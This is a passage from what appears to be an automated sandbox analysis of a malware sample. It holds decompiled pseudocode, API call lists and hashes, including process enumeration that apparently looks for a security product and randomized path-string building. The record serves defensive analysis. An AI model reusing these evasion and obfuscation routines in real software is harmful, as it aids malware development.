                                                                                                                                                                                                                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                						if(_t31 == 0) {
                                                                                                                                                                                                                                							L20:
                                                                                                                                                                                                                                							if(_t25 != 0) {
                                                                                                                                                                                                                                								CloseHandle(_t25);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L22;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                0x02bb6d70
                                                                                                                                                                                                                                0x02bb6d76
                                                                                                                                                                                                                                0x02bb6d76
                                                                                                                                                                                                                                0x02bb6d29
                                                                                                                                                                                                                                0x02bb6d2d
                                                                                                                                                                                                                                0x02bb6d64
                                                                                                                                                                                                                                0x02bb6d66
                                                                                                                                                                                                                                0x02bb6d69
                                                                                                                                                                                                                                0x02bb6d69
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb6d66
                                                                                                                                                                                                                                0x02bb6d2d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb6d17

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB6E66: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,052F9BB8,00000000,?,?,69B25F44,00000005,02BBD00C,?,?,02BB588F), ref: 02BB6E9C
                                                                                                                                                                                                                                  • Part of subcall function 02BB6E66: lstrcpy.KERNEL32(00000000,00000000), ref: 02BB6EC0
                                                                                                                                                                                                                                  • Part of subcall function 02BB6E66: lstrcat.KERNEL32(00000000,00000000), ref: 02BB6EC8
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(02BBD2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BB521B,?,00000001,?), ref: 02BB6CC3
                                                                                                                                                                                                                                  • Part of subcall function 02BB53BB: RtlFreeHeap.NTDLL(00000000,00000000,02BB12FA,00000000,?,?,00000000), ref: 02BB53C7
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,02BB521B,00000000,00000000,?,00000000,?,02BB521B,?,00000001,?,?,?,?,02BBA0EC), ref: 02BB6D23
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02BB521B,?,00000001,?), ref: 02BB6D51
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BB521B,?,00000001,?,?,?,?,02BBA0EC), ref: 02BB6D69
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 73268831-0
                                                                                                                                                                                                                                • Opcode ID: 92c69544c8ad0d89eb0a2bc3436fe28fd12c9e19242860885ea0b153e9d9556b
                                                                                                                                                                                                                                • Instruction ID: a3d293f55232ea8d0b2b5a32bf15106d1e5f0779f8a65c81ae93446b11fb2907
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92c69544c8ad0d89eb0a2bc3436fe28fd12c9e19242860885ea0b153e9d9556b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21F272A407566BCB335A6AC884BFB77ADEF88B54F050AA5F945AB100DBE4CC018750
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 40%
                                                                                                                                                                                                                                			E02BB516C(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                                                				signed int* _t39;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t36 = __ecx;
                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v12 = _a4;
                                                                                                                                                                                                                                				_t38 = E02BB5597(__ecx,  &_v32);
                                                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					_t39 = _a8;
                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                                						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                                                                                                                						_t23 = _t16;
                                                                                                                                                                                                                                						if( *_t16 != 0) {
                                                                                                                                                                                                                                							E02BB2C67(_t23);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					return _t38;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(E02BB9B32(0x40,  &_v16) != 0) {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t40 = CreateEventA(0x2bbd2e4, 1, 0,  *0x2bbd384);
                                                                                                                                                                                                                                				if(_t40 != 0) {
                                                                                                                                                                                                                                					SetEvent(_t40);
                                                                                                                                                                                                                                					Sleep(0xbb8);
                                                                                                                                                                                                                                					CloseHandle(_t40);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_push( &_v32);
                                                                                                                                                                                                                                				if(_a12 == 0) {
                                                                                                                                                                                                                                					_t29 = E02BB2D1C(_t36);
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_t29 = E02BB4847(_t36);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t41 = _v16;
                                                                                                                                                                                                                                				_t38 = _t29;
                                                                                                                                                                                                                                				if(_v16 != 0) {
                                                                                                                                                                                                                                					E02BB704F(_t41);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t39 = _a8;
                                                                                                                                                                                                                                					_t38 = E02BB6C82( &_v32, _t39);
                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                0x02bb5240
                                                                                                                                                                                                                                0x02bb51aa
                                                                                                                                                                                                                                0x02bb51ac
                                                                                                                                                                                                                                0x02bb51ac
                                                                                                                                                                                                                                0x02bb51c3
                                                                                                                                                                                                                                0x02bb51c7
                                                                                                                                                                                                                                0x02bb51ca
                                                                                                                                                                                                                                0x02bb51d5
                                                                                                                                                                                                                                0x02bb51dc
                                                                                                                                                                                                                                0x02bb51dc
                                                                                                                                                                                                                                0x02bb51e5
                                                                                                                                                                                                                                0x02bb51e9
                                                                                                                                                                                                                                0x02bb51f7
                                                                                                                                                                                                                                0x02bb51eb
                                                                                                                                                                                                                                0x02bb51eb
                                                                                                                                                                                                                                0x02bb51ec
                                                                                                                                                                                                                                0x02bb51ed
                                                                                                                                                                                                                                0x02bb51ee
                                                                                                                                                                                                                                0x02bb51ef
                                                                                                                                                                                                                                0x02bb51f0
                                                                                                                                                                                                                                0x02bb51f0
                                                                                                                                                                                                                                0x02bb51fc
                                                                                                                                                                                                                                0x02bb51ff
                                                                                                                                                                                                                                0x02bb5203
                                                                                                                                                                                                                                0x02bb5205
                                                                                                                                                                                                                                0x02bb5205
                                                                                                                                                                                                                                0x02bb520c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb520e
                                                                                                                                                                                                                                0x02bb520e
                                                                                                                                                                                                                                0x02bb521b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x02bb521b

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(02BBD2E4,00000001,00000000,00000040,00000001,?,747DF710,00000000,747DF730,?,?,?,02BBA0EC,?,00000001,?), ref: 02BB51BD
                                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000,?,?,?,02BBA0EC,?,00000001,?,00000002,?,?,02BB58BD,?), ref: 02BB51CA
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8,?,?,?,02BBA0EC,?,00000001,?,00000002,?,?,02BB58BD,?), ref: 02BB51D5
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,02BBA0EC,?,00000001,?,00000002,?,?,02BB58BD,?), ref: 02BB51DC
                                                                                                                                                                                                                                  • Part of subcall function 02BB2D1C: WaitForSingleObject.KERNEL32(00000000,?,?,?,02BB51FC,?,02BB51FC,?,?,?,?,?,02BB51FC,?), ref: 02BB2DF6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2559942907-0
                                                                                                                                                                                                                                • Opcode ID: f367ab3f8a1bf706baa0a2e19655cc0b37f4eb87e979c549fe47e8cbb8388725
                                                                                                                                                                                                                                • Instruction ID: 681c443564003679e5becb05d05d7b8811e82948fed1ef36d1be187c29bf29eb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f367ab3f8a1bf706baa0a2e19655cc0b37f4eb87e979c549fe47e8cbb8388725
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D210733D00259AFCF33AFE4C8848FEB77AEF08344B8048A6EA51A7000D7F499418B61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                			E02BB1A54(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr* _t28;
                                                                                                                                                                                                                                				intOrPtr _t31;
                                                                                                                                                                                                                                				intOrPtr* _t32;
                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                				int _t46;
                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                				int _t48;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t47 = __eax;
                                                                                                                                                                                                                                				_push( &_v12);
                                                                                                                                                                                                                                				_push(__eax);
                                                                                                                                                                                                                                				_t39 = 0;
                                                                                                                                                                                                                                				_t46 = 0;
                                                                                                                                                                                                                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                				_v8 = _t26;
                                                                                                                                                                                                                                				if(_t26 < 0) {
                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v12 == 0) {
                                                                                                                                                                                                                                					Sleep(0xc8);
                                                                                                                                                                                                                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v8 >= _t39) {
                                                                                                                                                                                                                                					_t28 = _v12;
                                                                                                                                                                                                                                					if(_t28 != 0) {
                                                                                                                                                                                                                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                						_v8 = _t31;
                                                                                                                                                                                                                                						if(_t31 >= 0) {
                                                                                                                                                                                                                                							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                							if(_t46 != 0) {
                                                                                                                                                                                                                                								_t46 = _t46 + 1;
                                                                                                                                                                                                                                								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                								_t39 = E02BB5157(_t48);
                                                                                                                                                                                                                                								if(_t39 == 0) {
                                                                                                                                                                                                                                									_v8 = 0x8007000e;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								__imp__#6(_v16);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t32 = _v12;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					 *_a4 = _t39;
                                                                                                                                                                                                                                					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                0x02bb1aa8
                                                                                                                                                                                                                                0x02bb1aae
                                                                                                                                                                                                                                0x02bb1ab3
                                                                                                                                                                                                                                0x02bb1abe
                                                                                                                                                                                                                                0x02bb1ac2
                                                                                                                                                                                                                                0x02bb1ac4
                                                                                                                                                                                                                                0x02bb1ac5
                                                                                                                                                                                                                                0x02bb1ace
                                                                                                                                                                                                                                0x02bb1ad2
                                                                                                                                                                                                                                0x02bb1ae3
                                                                                                                                                                                                                                0x02bb1ad4
                                                                                                                                                                                                                                0x02bb1ad9
                                                                                                                                                                                                                                0x02bb1ade
                                                                                                                                                                                                                                0x02bb1aed
                                                                                                                                                                                                                                0x02bb1aed
                                                                                                                                                                                                                                0x02bb1ac2
                                                                                                                                                                                                                                0x02bb1af3
                                                                                                                                                                                                                                0x02bb1af9
                                                                                                                                                                                                                                0x02bb1af9
                                                                                                                                                                                                                                0x02bb1b02
                                                                                                                                                                                                                                0x02bb1b07
                                                                                                                                                                                                                                0x02bb1b07
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1198164300-0
                                                                                                                                                                                                                                • Opcode ID: aa578e715780dcc02f9f9a743290673834d63c988f016c0345df8889b2f57329
                                                                                                                                                                                                                                • Instruction ID: 866c3632b63f36f46ad51bba8a70b68e55613644f4cd1f799b3bedbc1a59a947
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa578e715780dcc02f9f9a743290673834d63c988f016c0345df8889b2f57329
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0214475900209EFCB12DFA8D8989EEBBB9FF49345B1041A9E915D7210E7B0EA41CF60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E02BB698B(unsigned int __eax, void* __ecx) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                				signed short _t23;
                                                                                                                                                                                                                                				char* _t27;
                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                				unsigned int _t33;
                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                				unsigned int _t38;
                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                				void* _t42;
                                                                                                                                                                                                                                				int _t45;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t42 = __eax;
                                                                                                                                                                                                                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                                                                                                                                                                                                                				_t38 = __eax;
                                                                                                                                                                                                                                				_t30 = RtlAllocateHeap( *0x2bbd270, 0, (__eax >> 3) + __eax + 1);
                                                                                                                                                                                                                                				_v12 = _t30;
                                                                                                                                                                                                                                				if(_t30 != 0) {
                                                                                                                                                                                                                                					_v8 = _t42;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t33 = 0x18;
                                                                                                                                                                                                                                						if(_t38 <= _t33) {
                                                                                                                                                                                                                                							_t33 = _t38;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t21 =  *0x2bbd288; // 0x94834a61
                                                                                                                                                                                                                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                                                                                                                                                                                                                						 *0x2bbd288 = _t23;
                                                                                                                                                                                                                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                                                                                                                                                                                                                						memcpy(_t30, _v8, _t45);
                                                                                                                                                                                                                                						_v8 = _v8 + _t45;
                                                                                                                                                                                                                                						_t27 = _t30 + _t45;
                                                                                                                                                                                                                                						_t38 = _t38 - _t45;
                                                                                                                                                                                                                                						_t46 = _t46 + 0xc;
                                                                                                                                                                                                                                						 *_t27 = 0x2f;
                                                                                                                                                                                                                                						_t13 = _t27 + 1; // 0x1
                                                                                                                                                                                                                                						_t30 = _t13;
                                                                                                                                                                                                                                					} while (_t38 > 8);
                                                                                                                                                                                                                                					memcpy(_t30, _v8, _t38 + 1);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v12;
                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BB233E,00000000,?,?,02BBA714,?,052F95B0), ref: 02BB6996
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 02BB69AE
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,02BB233E,00000000,?,?,02BBA714,?,052F95B0), ref: 02BB69F2
                                                                                                                                                                                                                                • memcpy.NTDLL(00000001,?,00000001), ref: 02BB6A13
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1819133394-0
                                                                                                                                                                                                                                • Opcode ID: fe1e9c45a75d72024a680b0eaed8b8ef0eb0f532c63d9af0d093bf411f5b0436
                                                                                                                                                                                                                                • Instruction ID: e375fdf241846d393b71646bbbeca6d5b07938f931957127dad5089fae220db4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe1e9c45a75d72024a680b0eaed8b8ef0eb0f532c63d9af0d093bf411f5b0436
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7110672E00115AFC716CA69DC84DAABFBEEFC53A0B0501BAE54497140E7B0DE048760
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                                                                                			E02BB6ABB(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                				void _v60;
                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				intOrPtr _t27;
                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t27 = __edi;
                                                                                                                                                                                                                                				_t26 = _a8;
                                                                                                                                                                                                                                				_t28 = E02BB10E9(_a4, _t26, __edi);
                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                					memset( &_v60, 0, 0x38);
                                                                                                                                                                                                                                					_t18 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                					_t28 = 0;
                                                                                                                                                                                                                                					_v64 = 0x3c;
                                                                                                                                                                                                                                					if(_a12 == 0) {
                                                                                                                                                                                                                                						_t7 = _t18 + 0x2bbe4e8; // 0x70006f
                                                                                                                                                                                                                                						_t19 = _t7;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t6 = _t18 + 0x2bbe8f0; // 0x750072
                                                                                                                                                                                                                                						_t19 = _t6;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v52 = _t19;
                                                                                                                                                                                                                                					_push(_t28);
                                                                                                                                                                                                                                					_v48 = _a4;
                                                                                                                                                                                                                                					_v44 = _t26;
                                                                                                                                                                                                                                					_v36 = _t27;
                                                                                                                                                                                                                                					E02BB7020();
                                                                                                                                                                                                                                					_push( &_v64);
                                                                                                                                                                                                                                					if( *0x2bbd0e4() == 0) {
                                                                                                                                                                                                                                						_t28 = GetLastError();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_push(1);
                                                                                                                                                                                                                                					E02BB7020();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t28;
                                                                                                                                                                                                                                			}















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02BB10E9: SysAllocString.OLEAUT32(00000000), ref: 02BB1143
                                                                                                                                                                                                                                  • Part of subcall function 02BB10E9: SysAllocString.OLEAUT32(0070006F), ref: 02BB1157
                                                                                                                                                                                                                                  • Part of subcall function 02BB10E9: SysAllocString.OLEAUT32(00000000), ref: 02BB1169
                                                                                                                                                                                                                                • memset.NTDLL ref: 02BB6ADE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB6B2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString$ErrorLastmemset
                                                                                                                                                                                                                                • String ID: <$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3736384471-3662781078
                                                                                                                                                                                                                                • Opcode ID: 4a175a177f2d84ef7793f44689fbbe69e88545062a44af9f9af5a4ff6f939f50
                                                                                                                                                                                                                                • Instruction ID: 6eb8650b0581c19a656eedf74f155a241a207cb4474529de09f573ff59fb9fcb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a175a177f2d84ef7793f44689fbbe69e88545062a44af9f9af5a4ff6f939f50
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C101E171D00218AFDB12EF95D895EEEBBBCEF08744F454466F904E7150D7B09904CB91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E02BBA1D4() {
                                                                                                                                                                                                                                				char _v264;
                                                                                                                                                                                                                                				void* _v300;
                                                                                                                                                                                                                                				int _t8;
                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t15 = 0;
                                                                                                                                                                                                                                				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                				if(_t17 != 0) {
                                                                                                                                                                                                                                					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                					while(_t8 != 0) {
                                                                                                                                                                                                                                						_t9 =  *0x2bbd2e0; // 0x273a5a8
                                                                                                                                                                                                                                						_t2 = _t9 + 0x2bbee3c; // 0x73617661
                                                                                                                                                                                                                                						_push( &_v264);
                                                                                                                                                                                                                                						if( *0x2bbd110() != 0) {
                                                                                                                                                                                                                                							_t15 = 1;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L7:
                                                                                                                                                                                                                                						CloseHandle(_t17);
                                                                                                                                                                                                                                						goto L8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L7;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L8:
                                                                                                                                                                                                                                				return _t15;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BBA1E4
                                                                                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 02BBA1F7
                                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 02BBA223
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BBA232
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.881075443.0000000002BB1000.00000020.00020000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000005.00000002.881068169.0000000002BB0000.00000004.00020000.sdmp
• Associated: 00000005.00000002.881104776.0000000002BBC000.00000002.00020000.sdmp
• Associated: 00000005.00000002.881116688.0000000002BBD000.00000004.00020000.sdmp
• Associated: 00000005.00000002.881125153.0000000002BBF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                                                                                • Opcode ID: f1d2e6f34bd27fffd62ea1a08ded4cabc247ee67bec35c3193a449750c66f3a3
                                                                                                                                                                                                                                • Instruction ID: 070da7d1718ceb5a8d9eb9588fa880c19b25c89716e05a54f042c9f213e8cb72
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1d2e6f34bd27fffd62ea1a08ded4cabc247ee67bec35c3193a449750c66f3a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF0F032D001246BD723BA269C08EFF76ACDFC6350F4000A1E986D3000EAE4CA968BB1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E02BB1F47() {
                                                                                                                                                                                                                                				void* _t1;
                                                                                                                                                                                                                                				intOrPtr _t5;
                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t1 =  *0x2bbd2a4; // 0x2d8
